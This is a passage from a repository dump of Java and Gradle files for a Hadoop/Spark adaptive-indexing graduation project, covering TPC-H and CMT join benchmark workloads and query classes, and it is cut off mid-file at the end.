supplierPath + \"\\\", header \\\"false\\\", delimiter \\\"|\\\")\");\n\n\n\n // Create path table.\n String partPath = cfg.getHDFS_WORKING_DIR() + \"/\" + part + \"/data\";\n\n sqlContext.sql(\"CREATE TEMPORARY TABLE part (p_partkey int, p_name string, p_mfgr string, p_brand string, \"\n + \"p_type string, p_size int, p_container string, p_retailprice double) \"\n + \"USING com.databricks.spark.csv \"\n + \"OPTIONS (path \\\"\" + partPath + \"\\\", header \\\"false\\\", delimiter \\\"|\\\")\");\n\n\n }\n\n\n public void loadSettings(String[] args) {\n int counter = 0;\n while (counter < args.length) {\n switch (args[counter]) {\n case \"--method\":\n method = Integer.parseInt(args[counter + 1]);\n counter += 2;\n break;\n case \"--numQueries\":\n numQueries = Integer.parseInt(args[counter + 1]);\n counter += 2;\n break;\n default:\n // Something we don't use\n counter += 2;\n break;\n }\n }\n }\n\n\n /*\n select\n count(*)\n from\n customer,\n orders,\n lineitem\n where\n c_custkey = o_custkey\n and l_orderkey = o_orderkey\n and c_mktsegment = '[SEGMENT]'\n and o_orderdate < date '[DATE]'\n and l_shipdate > date '[DATE]'\n\n (lineitem ⋈ orders) ⋈ customer\n */\n\n public void tpch3() {\n int rand_3 = rand.nextInt(mktSegmentVals.length);\n String c_mktsegment = mktSegmentVals[rand_3];\n Calendar c = new GregorianCalendar();\n int dateOffset = (int) (rand.nextFloat() * (31 + 28 + 31));\n c.set(1995, Calendar.MARCH, 01);\n c.add(Calendar.DAY_OF_MONTH, dateOffset);\n SimpleDate d3 = new SimpleDate(c.get(Calendar.YEAR),\n c.get(Calendar.MONTH), c.get(Calendar.DAY_OF_MONTH));\n\n String customerPredicate = \"c_mktsegment <= \\\"\" + c_mktsegment + \"\\\"\";\n String ordersPredicate = \"o_orderdate < \\\"\" + d3 + \"\\\"\";\n String lineitemPredicate = \"l_shipdate > \\\"\" + d3 + \"\\\"\";\n\n\n if (rand_3 > 0) {\n String c_mktsegment_prev = mktSegmentVals[rand_3 - 1];\n customerPredicate = \"c_mktsegment > \\\"\" + c_mktsegment_prev + \"\\\" and \" + customerPredicate;\n }\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM lineitem JOIN orders ON l_orderkey = o_orderkey JOIN customer ON o_custkey = c_custkey \"\n + \"WHERE \" + lineitemPredicate + \" and \" + ordersPredicate + \" and \" + customerPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM lineitem JOIN orders ON l_orderkey = o_orderkey JOIN customer ON o_custkey = c_custkey \"\n + \"WHERE \" + lineitemPredicate + \" and \" + ordersPredicate + \" and \" + customerPredicate);\n\n long result = df.count(); // 29569\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n /*\n select\n\t count(*)\n from\n customer,\n orders,\n lineitem,\n supplier\n where\n c_custkey = o_custkey\n and l_orderkey = o_orderkey\n and l_suppkey = s_suppkey\n and c_region = '[REGION]'\n and s_region = '[REGION]'\n and o_orderdate >= date '[DATE]'\n and o_orderdate < date '[DATE]' + interval '1' year\n\n ((customer ⋈ orders) ⋈ lineitem) ⋈ supplier\n */\n\n public void tpch5() {\n int rand_5 = rand.nextInt(regionNameVals.length);\n String r_name_5 = regionNameVals[rand_5];\n int year_5 = 1993 + rand.nextInt(5);\n SimpleDate d5_1 = new SimpleDate(year_5, 1, 1);\n SimpleDate d5_2 = new SimpleDate(year_5 + 1, 1, 1);\n\n String customerPredicate = \"c_region <= \\\"\" + r_name_5 + \"\\\"\";\n String supplierPredicate = \"s_region <= \\\"\" + r_name_5 + \"\\\"\";\n String ordersPredicate = \"o_orderdate >= \\\"\" + d5_1 + \"\\\" and o_orderdate < \\\"\" + d5_2 + \"\\\"\";\n\n if (rand_5 > 0) {\n String r_name_prev_5 = regionNameVals[rand_5 - 1];\n customerPredicate = \"c_region > \\\"\" + r_name_prev_5 + \"\\\" and \" + customerPredicate;\n supplierPredicate = \"s_region > \\\"\" + r_name_prev_5 + \"\\\" and \" + supplierPredicate;\n }\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM customer JOIN orders ON c_custkey = o_custkey \"\n + \"JOIN lineitem ON l_orderkey = o_orderkey \"\n + \"JOIN supplier ON l_suppkey = s_suppkey \"\n + \"WHERE \" + customerPredicate + \" and \" + ordersPredicate + \" and \" + supplierPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM customer JOIN orders ON c_custkey = o_custkey \"\n + \"JOIN lineitem ON l_orderkey = o_orderkey \"\n + \"JOIN supplier ON l_suppkey = s_suppkey \"\n + \"WHERE \" + customerPredicate + \" and \" + ordersPredicate + \" and \" + supplierPredicate);\n\n long result = df.count(); // 35307\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n /*\n select\n count(*)\n from\n lineitem\n where\n l_shipdate >= date '[DATE]'\n and l_shipdate < date '[DATE]' + interval '1' year\n and l_discount between [DISCOUNT] - 0.01 and [DISCOUNT] + 0.01\n and l_quantity < [QUANTITY];\n */\n\n public void tpch6() {\n int year_6 = 1993 + rand.nextInt(5);\n SimpleDate d6_1 = new SimpleDate(year_6, 1, 1);\n SimpleDate d6_2 = new SimpleDate(year_6 + 1, 1, 1);\n double discount = rand.nextDouble() * 0.07 + 0.02;\n double quantity = rand.nextInt(2) + 24.0;\n\n String lineitemPredicate = \"l_shipdate >= \\\"\" + d6_1 + \"\\\" and l_shipdate < \\\"\" + d6_2 + \"\\\" and \"\n + \" l_discount > \" + (discount - 0.01) + \" and l_discount <= \" + (discount + 0.01)\n + \" and l_quantity <= \" + quantity;\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM lineitem \"\n + \"WHERE \" + lineitemPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM lineitem \"\n + \"WHERE \" + lineitemPredicate);\n\n long result = df.count(); // 83063\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n\n /*\n select\n count(*)\n from\n part,\n lineitem,\n orders,\n customer\n where\n p_partkey = l_partkey\n and l_orderkey = o_orderkey\n and o_custkey = c_custkey\n and c_region = '[REGION]'\n and o_orderdate between date '1995-01-01' and date '1996-12-31'\n and p_type = '[TYPE]'\n\n ((lineitem ⋈ orders) ⋈ customer) ⋈ part\n */\n\n public void tpch8() {\n int rand_8_1 = rand.nextInt(regionNameVals.length);\n String r_name_8 = regionNameVals[rand_8_1];\n SimpleDate d8_1 = new SimpleDate(1995, 1, 1);\n SimpleDate d8_2 = new SimpleDate(1996, 12, 31);\n String p_type_8 = partTypeVals[rand.nextInt(partTypeVals.length)];\n\n\n String customerPredicate = \"c_region <= \\\"\" + r_name_8 + \"\\\"\";\n String ordersPredicate = \"o_orderdate >= \\\"\" + d8_1 + \"\\\" and o_orderdate < \\\"\" + d8_2 + \"\\\"\";\n String partPredicate = \"p_type = \\\"\" + p_type_8 + \"\\\"\";\n\n\n if (rand_8_1 > 0) {\n String r_name_prev_8 = regionNameVals[rand_8_1 - 1];\n customerPredicate = \"c_region > \\\"\" + r_name_prev_8 + \"\\\" and \" + customerPredicate;\n }\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM customer JOIN orders ON c_custkey = o_custkey \"\n + \"JOIN lineitem ON l_orderkey = o_orderkey \"\n + \"JOIN part ON l_partkey = p_partkey \"\n + \"WHERE \" + customerPredicate + \" and \" + ordersPredicate + \" and \" + partPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM customer JOIN orders ON c_custkey = o_custkey \"\n + \"JOIN lineitem ON l_orderkey = o_orderkey \"\n + \"JOIN part ON l_partkey = p_partkey \"\n + \"WHERE \" + customerPredicate + \" and \" + ordersPredicate + \" and \" + partPredicate);\n\n long result = df.count(); // 0\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n /*\n select\n count(*)\n from\n orders,\n lineitem,\n customer\n where\n l_orderkey = o_orderkey\n and c_custkey = o_custkey\n and o_orderdate >= date '[DATE]'\n and o_orderdate < date '[DATE]' + interval '3' month\n and l_returnflag = 'R'\n\n (lineitem ⋈ orders) ⋈ customer\n */\n\n\n public void tpch10() {\n String l_returnflag_10 = \"R\";\n String l_returnflag_prev_10 = \"N\";\n int year_10 = 1993;\n int monthOffset = rand.nextInt(24);\n SimpleDate d10_1 = new SimpleDate(year_10 + monthOffset / 12, monthOffset % 12 + 1, 1);\n monthOffset = monthOffset + 3;\n SimpleDate d10_2 = new SimpleDate(year_10 + monthOffset / 12, monthOffset % 12 + 1, 1);\n\n String ordersPredicate = \"o_orderdate >= \\\"\" + d10_1 + \"\\\" and o_orderdate < \\\"\" + d10_2 + \"\\\"\";\n String lineitemPredicate = \"l_returnflag <= \\\"\" + l_returnflag_10 + \"\\\" and l_returnflag > \\\"\" + l_returnflag_prev_10 + \"\\\"\";\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM lineitem JOIN orders ON l_orderkey = o_orderkey \"\n + \"JOIN customer ON c_custkey = o_custkey \"\n + \"WHERE \" + ordersPredicate + \" and \" + lineitemPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM lineitem JOIN orders ON l_orderkey = o_orderkey \"\n + \"JOIN customer ON c_custkey = o_custkey \"\n + \"WHERE \" + ordersPredicate + \" and \" + lineitemPredicate);\n\n long result = df.count(); // 111918\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n /*\n select\n count(*)\n from\n orders,\n lineitem\n where\n o_orderkey = l_orderkey\n and l_shipmode in ('[SHIPMODE1]', '[SHIPMODE2]')\n and l_receiptdate >= date '[DATE]'\n and l_receiptdate < date '[DATE]' + interval '1' year\n\n lineitem ⋈ orders\n */\n\n public void tpch12() {\n int rand_12 = rand.nextInt(shipModeVals.length);\n String shipmode_12 = shipModeVals[rand_12];\n int year_12 = 1993 + rand.nextInt(5);\n SimpleDate d12_1 = new SimpleDate(year_12, 1, 1);\n SimpleDate d12_2 = new SimpleDate(year_12 + 1, 1, 1);\n\n String lineitemPredicate = \"l_shipmode <= \\\"\" + shipmode_12 + \"\\\" and l_receiptdate >= \\\"\" + d12_1 + \"\\\" and \"\n + \"l_receiptdate < \\\"\" + d12_2 + \"\\\"\";\n\n if (rand_12 > 0) {\n String shipmode_prev_12 = shipModeVals[rand_12 - 1];\n lineitemPredicate = \"l_shipmode > \\\"\" + shipmode_prev_12 + \"\\\" and \" + lineitemPredicate;\n }\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM lineitem JOIN orders ON l_orderkey = o_orderkey \"\n + \"WHERE \" + lineitemPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM lineitem JOIN orders ON l_orderkey = o_orderkey \"\n + \"WHERE \" + lineitemPredicate);\n\n long result = df.count(); // 130474\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n /*\n select\n count(*)\n from\n lineitem,\n part\n where\n l_partkey = p_partkey\n and l_shipdate >= date '[DATE]'\n and l_shipdate < date '[DATE]' + interval '1' month;\n\n lineitem ⋈ part\n */\n\n public void tpch14() {\n int year_14 = 1993;\n int monthOffset_14 = rand.nextInt(60);\n SimpleDate d14_1 = new SimpleDate(year_14 + monthOffset_14 / 12, monthOffset_14 % 12 + 1, 1);\n monthOffset_14 += 1;\n SimpleDate d14_2 = new SimpleDate(year_14 + monthOffset_14 / 12, monthOffset_14 % 12 + 1, 1);\n\n String lineitemPredicate = \"l_shipdate >= \\\"\" + d14_1 + \"\\\" and l_shipdate < \\\"\" + d14_2 + \"\\\"\";\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM lineitem JOIN part ON l_partkey = p_partkey \"\n + \"WHERE \" + lineitemPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM lineitem JOIN part ON l_partkey = p_partkey \"\n + \"WHERE \" + lineitemPredicate);\n\n long result = df.count(); // 76860\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n /*\n select\n count(*)\n from\n lineitem,\n part\n where\n p_partkey = l_partkey\n and l_shipinstruct = ‘DELIVER IN PERSON’\n and p_brand = ‘[BRAND]’\n and p_container = ‘SM CASE’\n and l_quantity >= [QUANTITY]\n and l_quantity <= [QUANTITY] + 10\n and p_size between 1 and 5\n and l_shipmode <= ‘AIR REG’\n\n lineitem ⋈ part\n */\n\n public void tpch19() {\n String brand_19 = \"Brand#\" + (rand.nextInt(5) + 1) + \"\" + (rand.nextInt(5) + 1);\n String shipInstruct_19 = \"DELIVER IN PERSON\";\n double quantity_19 = rand.nextInt(10) + 1;\n\n String lineitemPredicate = \"l_shipinstruct = \\\"\" + shipInstruct_19 + \"\\\" and l_quantity > \" + quantity_19;\n String partPredicate = \"p_brand = \\\"\" + brand_19 + \"\\\" and p_container = \\\"SM CASE\\\"\";\n quantity_19 += 10;\n\n lineitemPredicate = lineitemPredicate + \" and l_quantity <= \" + quantity_19 + \" and l_shipmode <= \\\"AIR\\\"\";\n partPredicate = partPredicate + \" and p_size >= 1 and p_size <= 5\";\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM lineitem JOIN part ON l_partkey = p_partkey \"\n + \"WHERE \" + lineitemPredicate + \" and \" + partPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM lineitem JOIN part ON l_partkey = p_partkey \"\n + \"WHERE \" + lineitemPredicate + \" and \" + partPredicate);\n\n long result = df.count(); // 10\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n public void runWorkload() {\n System.out.println(\"Run TPCH-3\");\n rand.setSeed(0);\n tpch3();\n System.out.println(\"Run TPCH-5\");\n rand.setSeed(0);\n tpch5();\n System.out.println(\"Run TPCH-6\");\n rand.setSeed(0);\n tpch6();\n System.out.println(\"Run TPCH-8\");\n rand.setSeed(0);\n tpch8();\n System.out.println(\"Run TPCH-10\");\n rand.setSeed(0);\n tpch10();\n System.out.println(\"Run TPCH-12\");\n rand.setSeed(0);\n tpch12();\n System.out.println(\"Run TPCH-14\");\n rand.setSeed(0);\n tpch14();\n System.out.println(\"Run TPCH-19\");\n rand.setSeed(0);\n tpch19();\n }\n\n public static void main(String[] args) {\n\n BenchmarkSettings.loadSettings(args);\n BenchmarkSettings.printSettings();\n\n TPCHSparkJoinWorkload t = new TPCHSparkJoinWorkload();\n t.loadSettings(args);\n t.setUp();\n\n switch (t.method) {\n case 1:\n t.runWorkload();\n break;\n\n default:\n break;\n }\n\n }\n}\n" }, { "alpha_fraction": 0.6263736486434937, "alphanum_fraction": 0.692307710647583, "avg_line_length": 28.1200008392334, "blob_id": "9ee2fa86c249a0c0fa7f6341579c9735a529898a", "content_id": "6dcbcf6a276ff199c725754c6e424c3c501cacd4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 728, "license_type": "no_license", "max_line_length": 68, "num_lines": 25, "path": "/build.gradle", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "group 'com.sy.GraduationProject'\nversion '1.0-SNAPSHOT'\n\napply plugin: 'java'\n\nsourceCompatibility = 1.8\n\nrepositories {\n mavenCentral()\n}\n\ndependencies {\n compile 'org.slf4j:slf4j-api:1.7.12'\n compile 'org.apache.hadoop:hadoop-common:2.6.0'\n compile 'org.apache.hadoop:hadoop-hdfs:2.6.0'\n compile 'org.apache.hadoop:hadoop-mapreduce-client-common:2.6.0'\n compile 'org.apache.spark:spark-core_2.11:1.6.0'\n compile 'org.apache.spark:spark-sql_2.11:1.6.0'\n compile 'com.databricks:spark-csv_2.11:1.3.0'\n compile 'org.apache.commons:commons-math3:3.5'\n compile 'org.apache.commons:commons-csv:1.2'\n compile 'junit:junit:4.12'\n //\n testCompile group: 'junit', name: 'junit', version: '4.12'\n}\n" }, { "alpha_fraction": 0.6622315645217896, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 23.620689392089844, "blob_id": "72542bd9ba5042b3549fb72832cd45ea136f4a4d", "content_id": "6a7e32e390597a74bac8bbde99895d5042eb3fb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4284, "license_type": "no_license", "max_line_length": 91, "num_lines": 174, "path": "/src/main/java/perf/benchmark/CMTWorkload.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package perf.benchmark;\n\nimport core.adapt.Predicate;\nimport core.adapt.Predicate.PREDTYPE;\nimport core.adapt.Query;\nimport core.adapt.spark.SparkQuery;\nimport core.common.globals.Globals;\nimport core.common.globals.TableInfo;\nimport core.utils.ConfUtils;\nimport core.utils.HDFSUtils;\nimport core.utils.TypeUtils;\nimport core.utils.TypeUtils.TYPE;\nimport org.apache.hadoop.fs.FileSystem;\n\nimport java.util.ArrayList;\nimport java.util.List;\n\npublic class CMTWorkload {\n\tpublic ConfUtils cfg;\n\n\tpublic String schemaString;\n\n\tint numFields;\n\n\tint method;\n\n String tableName;\n\n TableInfo tableInfo;\n\n\tpublic void setUp() {\n\t\ttableName = \"cmt\";\n\n\t\tcfg = new ConfUtils(BenchmarkSettings.conf);\n\t\tFileSystem fs = HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME());\n\n\t\t// Load table info.\n\t\tGlobals.loadTableInfo(tableName, cfg.getHDFS_WORKING_DIR(), fs);\n\t\ttableInfo = Globals.getTableInfo(tableName);\n\t\tassert tableInfo != null;\n\t}\n\n\tpublic Predicate getPredicate(String pred) {\n\t\tString[] parts = pred.split(\" \");\n\n\t\tint attrId = tableInfo.schema.getAttributeId(parts[0].trim());\n\t\t\n\t\tif (attrId == -1) {\n\t\t\tthrow new RuntimeException(\"Unknown attr: \" + parts[0].trim());\n\t\t}\n\t\t\n\t\tTYPE attrType = tableInfo.schema.getType(attrId);\n\t\tObject value = TypeUtils.deserializeValue(attrType, parts[2].trim().replaceAll(\"'\", \"\"));\n\t\tString predTypeStr = parts[1].trim();\n\t\tPREDTYPE predType;\n\t\tswitch (predTypeStr) {\n\t\tcase \">\":\n\t\t\tpredType = PREDTYPE.GT;\n\t\t\tbreak;\n\t\tcase \">=\":\n\t\t\tpredType = PREDTYPE.GEQ;\n\t\t\tbreak;\n\t\tcase \"<\":\n\t\t\tpredType = PREDTYPE.LT;\n\t\t\tbreak;\n\t\tcase \"<=\":\n\t\t\tpredType = PREDTYPE.LEQ;\n\t\t\tbreak;\n\t\tcase \"=\":\n\t\t\tpredType = PREDTYPE.EQ;\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tthrow new RuntimeException(\"Unknown predType \" + predTypeStr);\n\t\t}\n\n\t\tPredicate p = new Predicate(tableInfo, parts[0].trim(), attrType, value, predType);\n\t\treturn p;\n\t}\n\t\n\tpublic List<Query> generateWorkload() {\n\t\tbyte[] stringBytes = HDFSUtils.readFile(\n\t\t\t\tHDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME()),\n\t\t\t\t\"/user/mdindex/cmt_queries.log\");\n\t\tString queriesString = new String(stringBytes);\n\t\tString[] queries = queriesString.split(\"\\n\");\n\t\tList<Query> ret = new ArrayList<Query>();\n\t\tfor (int i=0; i<queries.length; i++) {\n\t\t\tString queryString = queries[i];\n\t\t\tString[] parts = queryString.split(\"\\\\|\");\n\t\t\tString[] predicates = parts[1].split(\";\");\n\t\t\tList<Predicate> queryPreds = new ArrayList<Predicate>();\n\t\t\tfor (int j=0; j<predicates.length; j++) {\n\t\t\t\tPredicate p = getPredicate(predicates[j]);\n\t\t\t\tList<Predicate> preds = p.getNormalizedPredicates();\n\t\t\t\tqueryPreds.addAll(preds);\n\t\t\t}\n\t\t\tPredicate[] predArray = queryPreds.toArray(new Predicate[queryPreds.size()]);\n\t\t\tret.add(new Query(tableName, predArray));\n\t\t}\n\n\t\treturn ret;\n\t}\n\n public void testWorkload() {\n\t\tlong start, end;\n\t\tSparkQuery sq = new SparkQuery(cfg);\n\t\tList<Query> queries = generateWorkload();\n\t\tfor (Query q: queries) {\n\t\t\tSystem.out.println(\"INFO: Query:\" + q.toString());\n\t\t}\n\t}\n\n\tpublic void runWorkload() {\n\t\tlong start, end;\n\t\tSparkQuery sq = new SparkQuery(cfg);\n\t\tList<Query> queries = generateWorkload();\n\t\tfor (Query q: queries) {\n\t\t\tSystem.out.println(\"INFO: Query:\" + q.toString());\n\t\t}\n\n\t\tfor (Query q : queries) {\n\t\t\tstart = System.currentTimeMillis();\n\t\t\tlong result = sq.createAdaptRDD(cfg.getHDFS_WORKING_DIR(),\n\t\t\t\t\tq).count();\n\t\t\tend = System.currentTimeMillis();\n\t\t\tSystem.out.println(\"RES: Time Taken: \" + (end - start) +\n\t\t\t\t\t\"; Result: \" + result);\n\t\t}\n\t}\n\n\tpublic void loadSettings(String[] args) {\n\t\tint counter = 0;\n\t\twhile (counter < args.length) {\n\t\t\tswitch (args[counter]) {\n\t\t\tcase \"--schema\":\n\t\t\t\tschemaString = args[counter + 1];\n\t\t\t\tcounter += 2;\n\t\t\t\tbreak;\n\t\t\tcase \"--numFields\":\n\t\t\t\tnumFields = Integer.parseInt(args[counter + 1]);\n\t\t\t\tcounter += 2;\n\t\t\t\tbreak;\n\t\t\tcase \"--method\":\n\t\t\t\tmethod = Integer.parseInt(args[counter + 1]);\n\t\t\t\tcounter += 2;\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\t// Something we don't use\n\t\t\t\tcounter += 2;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tBenchmarkSettings.loadSettings(args);\n\t\tBenchmarkSettings.printSettings();\n\n\t\tCMTWorkload t = new CMTWorkload();\n\t\tt.loadSettings(args);\n\t\tt.setUp();\n\n\t\tswitch (t.method) {\n\t\tcase 1:\n\t\t\tt.runWorkload();\n\t\t\tbreak;\n case 2:\n \tt.testWorkload();\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tbreak;\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.6093429327011108, "alphanum_fraction": 0.6160164475440979, "avg_line_length": 24.63157844543457, "blob_id": "362b793c4747c671e5b1d5c7d74874e819bcf070", "content_id": "fcdda2c97f27190fb361013bc0c294ee05dd64a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1948, "license_type": "no_license", "max_line_length": 79, "num_lines": 76, "path": "/src/main/java/core/adapt/JoinQuery.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package core.adapt;\n\n\nimport java.io.DataOutput;\nimport java.io.IOException;\nimport java.io.Serializable;\n\nimport core.adapt.Predicate;\nimport core.adapt.Query;\nimport org.apache.hadoop.io.Text;\n\nimport com.google.common.base.Joiner;\n\n/**\n * Created by ylu on 1/25/16.\n */\n\npublic class JoinQuery implements Serializable {\n private static final long serialVersionUID = 1L;\n\n private Predicate[] predicates;\n private String table;\n private int joinAttribute;\n\n public JoinQuery(String queryString) {\n String[] parts = queryString.split(\"\\\\|\");\n this.table = parts[0];\n this.joinAttribute = Integer.parseInt(parts[1]);\n if (parts.length > 2) {\n String predString = parts[2].trim();\n String[] predParts = predString.split(\";\");\n this.predicates = new Predicate[predParts.length];\n for (int i = 0; i < predParts.length; i++) {\n this.predicates[i] = new Predicate(predParts[i]);\n }\n } else {\n this.predicates = new Predicate[0];\n }\n }\n\n public JoinQuery(String table, int joinAttribute, Predicate[] predicates) {\n this.table = table;\n this.joinAttribute = joinAttribute;\n this.predicates = predicates;\n }\n\n public Predicate[] getPredicates() {\n return this.predicates;\n }\n\n public String getTable() {\n return this.table;\n }\n\n public int getJoinAttribute(){\n return this.joinAttribute;\n }\n\n public Query castToQuery(){\n return new Query(table, predicates);\n }\n\n public void write(DataOutput out) throws IOException {\n Text.writeString(out, toString());\n }\n\n\n\n @Override\n public String toString() {\n String stringPredicates = \"\";\n if (predicates.length != 0)\n stringPredicates = Joiner.on(\";\").join(predicates);\n return table + \"|\" + joinAttribute + \"|\" + stringPredicates;\n }\n}\n" }, { "alpha_fraction": 0.6791393756866455, "alphanum_fraction": 0.6941066384315491, "avg_line_length": 25.725000381469727, "blob_id": "362780ad7a4e4e14cece3a360c004abc1e4673e1", "content_id": "73dd53bbd5351f76201a95b2a468e20eee47d558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1069, "license_type": "no_license", "max_line_length": 100, "num_lines": 40, "path": "/src/test/java/core/common/index/RobustTreeTest.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package core.common.index;\n\nimport core.adapt.Predicate;\nimport core.adapt.Query;\nimport core.common.globals.Globals;\nimport core.common.globals.TableInfo;\nimport core.common.key.ParsedTupleList;\nimport core.utils.ConfUtils;\nimport core.utils.HDFSUtils;\nimport core.utils.TypeUtils;\nimport org.apache.hadoop.fs.FileSystem;\n\nimport java.util.*;\n\n/**\n * Created by ylu on 2/10/16.\n */\npublic class RobustTreeTest {\n public static void main(String[] args){\n\n\n\n ConfUtils cfg = new ConfUtils(\"/Users/ylu/Documents/workspace/mdindex/conf/ylu.properties\");\n FileSystem fs = HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME());\n\n byte[] sampleBytes = HDFSUtils.readFile(fs, \"/index\");\n\n\n RobustTree rt = new RobustTree();\n rt.unmarshall(sampleBytes);\n\n\n TypeUtils.SimpleDate d3 = new TypeUtils.SimpleDate(1995,\n 4, 14);\n\n Predicate p = new Predicate(10, TypeUtils.TYPE.DATE, d3, Predicate.PREDTYPE.GT);\n List<RNode> rr = rt.getMatchingBuckets( new Predicate[]{p});\n System.out.println();\n }\n}\n" }, { "alpha_fraction": 0.5588613152503967, "alphanum_fraction": 0.5638912916183472, "avg_line_length": 32.371429443359375, "blob_id": "47446f736777073bccb7a7551c9fdf4bca759a8e", "content_id": "63e69029effa02308d439a6c99cb39a26154f72f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 9348, "license_type": "no_license", "max_line_length": 152, "num_lines": 280, "path": "/src/main/java/perf/benchmark/CMTJoinWorkload.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package perf.benchmark;\n\nimport core.adapt.JoinQuery;\nimport core.adapt.Predicate;\nimport core.adapt.spark.RangePartitioner;\nimport core.adapt.spark.join.SparkJoinQuery;\nimport core.common.globals.Schema;\nimport core.common.globals.TableInfo;\nimport core.utils.ConfUtils;\nimport core.utils.HDFSUtils;\nimport core.utils.RangePartitionerUtils;\nimport core.utils.TypeUtils;\nimport org.apache.commons.io.FilenameUtils;\nimport org.apache.hadoop.fs.FileStatus;\nimport org.apache.hadoop.fs.FileSystem;\nimport org.apache.hadoop.fs.Path;\nimport org.apache.hadoop.io.LongWritable;\nimport org.apache.hadoop.io.Text;\nimport org.apache.spark.Partitioner;\nimport org.apache.spark.api.java.JavaPairRDD;\nimport org.apache.spark.api.java.JavaRDD;\nimport scala.Tuple2;\n\nimport java.io.FileNotFoundException;\nimport java.io.IOException;\nimport java.util.ArrayList;\nimport java.util.Random;\n\n\npublic class CMTJoinWorkload {\n\n private ConfUtils cfg;\n\n private Schema schemaMH, schemaMHL, schemaSF;\n private String stringMH, stringMHL, stringSF;\n private String MH = \"mh\", MHL = \"mhl\", SF = \"sf\";\n private TableInfo tableMH, tableMHL, tableSF;\n\n private Predicate[] EmptyPredicates = {};\n\n\n private int method;\n\n private int numQueries;\n\n private Random rand;\n\n public void setUp() {\n cfg = new ConfUtils(BenchmarkSettings.conf);\n rand = new Random();\n\n // Making things more deterministic.\n rand.setSeed(0);\n\n tableMH = new TableInfo(MH, 0, '|', schemaMH);\n tableMHL = new TableInfo(MHL, 0, '|', schemaMHL);\n tableSF = new TableInfo(SF, 0, '|', schemaSF);\n }\n\n public void garbageCollect(){\n FileSystem fs = HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME());\n\n tableMH.gc(cfg.getHDFS_WORKING_DIR(), fs);\n tableMHL.gc(cfg.getHDFS_WORKING_DIR(), fs);\n tableSF.gc(cfg.getHDFS_WORKING_DIR(), fs);\n }\n\n\n public void loadSettings(String[] args) {\n int counter = 0;\n while (counter < args.length) {\n switch (args[counter]) {\n case \"--schemaMH\":\n stringMH = args[counter + 1];\n schemaMH = Schema.createSchema(stringMH);\n counter += 2;\n break;\n case \"--schemaMHL\":\n stringMHL = args[counter + 1];\n schemaMHL = Schema.createSchema(stringMHL);\n counter += 2;\n break;\n case \"--schemaSF\":\n stringSF = args[counter + 1];\n schemaSF = Schema.createSchema(stringSF);\n counter += 2;\n break;\n case \"--method\":\n method = Integer.parseInt(args[counter + 1]);\n counter += 2;\n break;\n case \"--numQueries\":\n numQueries = Integer.parseInt(args[counter + 1]);\n counter += 2;\n break;\n default:\n // Something we don't use\n counter += 2;\n break;\n }\n }\n }\n\n public void cleanup(String path){\n FileSystem fs = HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME());\n try {\n fs.delete(new Path(path), true);\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n\n\n public void postProcessing(String path, String tableName, Schema schema) {\n\n /* rename part-0000i to i and create an info file*/\n\n try {\n FileSystem fs = 